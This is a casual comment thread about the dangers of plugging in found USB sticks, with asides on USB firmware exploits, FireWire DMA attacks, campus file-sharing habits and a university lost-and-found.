If the USB port chipset is smart enough, it may communicate with the plugged-in devices in ways that are harmful - such as exploiting a bug in the USB chipset's firmware - before the non-firmware software can act on it.
This is where a "USB condom" comes in - while it is a single point of failure (its software can be buggy) it is a single, small thing that can be designed and built with security in mind from the get-go.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
This message predated USB for quite a while, and the old PS/2 ports are not hot pluggable. So it used to be see message... plug in keyboard... push reset* button.
*Remember those?
Firewire is (was?) similar since it had DMA access, so in theory a malicious firewire device could completely own the host if it was plugged in. Though in firewire's case, I never saw anything do that besides a few proofs of concept.
This kind of thing has been going on for a long long time... it's called sex.
Is that true on a college campus though where people use the USB sticks for all their files?
Yes, yes it is. But even if you ignore stats themselves, ask yourself how do juicy selfies end up on a USB stick:
Step 1: Take selfie with mobile phone.
Step 2a: Share selfie with friend. No USB stick required, in fact stupid amounts of effort involved.
Step 2b: Copy selfie to computer. No USB stick required.
Step 1b: Take selfie with camera. Wait what? Who has cameras these days? When has a juicy selfie ever been a high quality 20mpxl photo?
It just doesn't make sense that people would put juicy selfies on a USB stick these days and half the problem with being on campus is Universities not providing easy means of remote access and ability to easily print. UQ actually went through a little bit of a change a few years ago. With the introduction of Google Docs, the removal of the stupid arbitrary 100MB / month data cap on university accounts, and the ability to connect and print via wifi, USB sticks almost went away completely.
At least they went away to the point where the service centre no longer has a lost and found for USB sticks. Sidenote: This was a great source of free USB sticks while I was at uni. Go to the lost and found and say you lost your USB stick and the guy at the counter asks what does it look like and if you said something like the red one with Verbatim written on it, or the Sandisk one, or a yellow one with a company logo on it, you get a free USB stick (no selfies though).
I get annoyed when people don't put a readme.txt in the root.
Hm. Honestly, it had never occurred to me to do this, but that's a good idea. Back in the day of floppies, I'd regularly put contact info on the label in case I lost it, but I never really translated it to USB sticks. I'm more prone to breaking them than losing them, so maybe it doesn't matter anyway, but it's still a good suggestion.
Considering how much work I'm willing to put into getting someone their USB drive back anything I can do to make it better for someone else.
My flash drives are always Portable Apps installations so it's:
Just another second banana
He he he, use a raspberry or even an arduino concoction to test your USBs! I have one in mind but still little chance to finally build it. Too late though, the USB I found is already lost and forgotten... unless it did manage to leave a payload. NO way to give it back, it was a tourist s, seemingly, and a lot of effort. And yes, the THOUGHT did come to me but, alas! what CAN YOU DO? A found USB stick is good value overall to find! So eventually you dismiss the danger issue and hope for the best. This lap seems to have all autoruns disabled and no way to activate them, autorun is indeed one of the best values but it usually does NOT work. What worries me more is NOT a found USB but an actual OEM IMITATION STICK with WIFI RADIO included. One of my branded USB sticks reported four gigabytes less than the actual size, which is enough to have a full raspberry NOOB OS! Reformatting did not recover space at all and still I am using it, STILL unsure I did notice some old game zip was no longer there? Unfortunately this comments provide no solution to the general problem beyond that of ABSTAIN.